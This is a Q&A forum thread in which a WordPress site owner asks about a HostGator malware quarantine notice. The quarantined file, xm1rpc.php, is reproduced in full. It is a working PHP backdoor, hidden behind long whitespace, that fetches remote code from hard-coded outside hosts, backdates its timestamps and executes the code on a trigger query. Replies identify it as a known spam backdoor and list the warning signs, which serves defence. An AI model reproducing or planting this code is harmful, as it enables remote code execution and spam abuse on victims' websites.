# Hosting send virus errors could not get rid of this

Tags: virus, web-hosting, virus-removal

I have a wordpress website and hostgator keeps on sending this information →

> During a scan of our servers we identified malicious content in
>   accounts under your control. We have quarantined the files listed
>   below to prevent abuse. Please note that no services have been
>   disabled and no legitimate content has been affected by this action.
>   However, it is possible that other malicious activity may have
>   disrupted your services.
>
> The most important things you can do to ensure the security of your
>   account are to make sure your software (e.g WordPress) is up-to-date,
>   and that your passwords are strong. We strongly encourage you to
>   change all of your account passwords and update all software as soon
>   as possible to prevent any further compromises or abuse.
>
> We understand that any risk to our network reputation is a risk to our
>   customers' reputation and so we take third-party reports of network
>   abuse seriously. In order to protect our shared reputation we may
>   disable account services in the event of a third-party report of
>   network abuse until we are confident that the account has been
>   properly cleaned and secured.
>
> This email is to inform you of content found by our proactive scans,
>   and is not the result of a third-party abuse report. No services have
>   been disabled as a result of this discovery. Additional information on
>   HostGator's policies, and what activity is damaging to a network's
>   reputation in general, is available in our knowledge base: Acceptable
>   Use Policy
>
> My Account was Hacked
>
> If you would like help in securing your account we recommend SiteLock,
>   a security service and partner of ours. They can be contacted at
>   844-631-8637. HostGator Security Department Quarantined files:
>   /home2/xxxxx/public_html/xm1rpc.php
>
> ---

I have attached the file:

```
<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: ''; 
if (false !== strpos($query, 'simpler-ws')) { 
  __1get_ws(); 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  require($ws_file); die(''); 
} 

function __1get_root() { 
  $localpath=getenv("SCRIPT_NAME");
  $absolutepath=getenv("SCRIPT_FILENAME");
  $root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
  return $root_path; 
} 

function __1get_ws() { 
  $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: ''; 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  if (file_exists($ws_file)) { 
    chmod($ws_file, 0644); 
  } 
  if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*1)) { 
  $ws = __1fetch_url(__get_rev().'&get_ws'); 
  if (!empty($ws)) 
    file_put_contents($ws_file, $ws); 
    chmod($ws_file, 0644); 
    touch($ws_file, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
    touch(dirname($ws_file) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
  } else { 
    $ws = file_get_contents($ws_file); 
  } 
  return $ws; 
} 

function __get_rev() { 
  return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); 
  return 'http://nezlobudnya.com/generate'; 
} 

function __1fetch_url($url) { 
  $contents = false; 
  $errs = 0; 
  while ( !$contents && ($errs++ < 3) ) { 
    $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'; 
      if (is_callable('curl_init')) { 
        $c = curl_init($url); 
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); 
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($c, CURLOPT_USERAGENT,$user_agent); 
        $contents = curl_exec($c); 
          if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) 
              $contents = false; 
              curl_close($c); 
          } else { 
              $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen')); 
                 if ($allowUrlFopen) { 
                    $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); 
                 } 
          } 
      } 
   return $contents; 
}
// Silence is golden
```

I have run a succuri scan, but it could not find any virus. whats the issue?

Comment: That is a standard file on wordpress sites.

Comment: @MathMan Note that there is actual PHP code if you scroll far to the right.

Comment: Ah yes that looks very suspicious particularly if you have no association with the domain bokoinchina dot com which is hard coded into that code.

Comment: You probably have a backdoor on your site. Perhaps other people will weigh in as well though.

Comment: The file and its code that i attached is actually quarantined by hostgator, but where exactly is this file located in the wordpress? I mean where wp-content or wp-admin or where?

Comment: Similar files are used quite often throughout the wordpress installation. But that exact file isn't in wordpress anywhere. Look at any of the directories that have only one php file and it should be index.php with the //silence is golden comment in it.

Comment: https://blog.sucuri.net/2016/11/xm1rpc-spam-backdoor.html It's a known attack.

Answer (score 1):

Points of suspicion with that file:

- a lot of wasted space prior to the code.
- starting it like a legitimate wordpress file but putting in code not found in that file typically.
- modifying the filename slightly by replacing l with 1
- changing the rights on other files programmatically.
- redirecting the page to a couple of other sites.
- not sanitizing the input strings.

You should probably check your server and code pretty thoroughly and then wipe the server and reinstall your WordPress site.